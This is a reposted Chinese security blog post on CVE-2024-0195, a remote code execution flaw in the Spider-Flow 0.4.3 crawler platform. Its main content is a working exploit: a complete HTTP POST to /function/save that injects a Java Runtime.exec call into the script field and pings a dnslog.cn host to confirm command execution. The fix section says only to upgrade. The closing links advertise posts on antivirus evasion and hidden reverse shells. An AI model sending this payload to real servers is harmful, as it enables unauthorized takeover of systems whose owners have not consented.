CVE-2024-0195 RCE漏洞(附EXP)
2024-1-18 14:43:57 Author: EchoSec(查看原文) 阅读量:71 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了

0x01 前言

   
SpiderFlow是ssssssss-team开源的一个爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。该系统存在RCE漏洞,攻击者构造恶意命令能够利用该漏洞获取服务器权限,导致服务器沦陷

0x02 漏洞影响

    影响版本

Spider-Flow 0.4.3

0x03 漏洞利用

界面是这个酱紫

EXP如下:

POST /function/save HTTP/1.1Host: ip:portContent-Length: 117Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+0gj0v8.dnslog.cn')%3B%7B

success!

0x04 修复方案

请升级最新版本。 

0x05 下载地址

点击下方名片进入公众号

回复【0195】获取指纹语法

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247488393&idx=1&sn=37594aa7b7c32978578832823308833e&chksm=fd0744f6f05c85d818ea8f1873cc3070a82a4a8616e7aecf1d374f624793e471fd66bab9c6ce&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh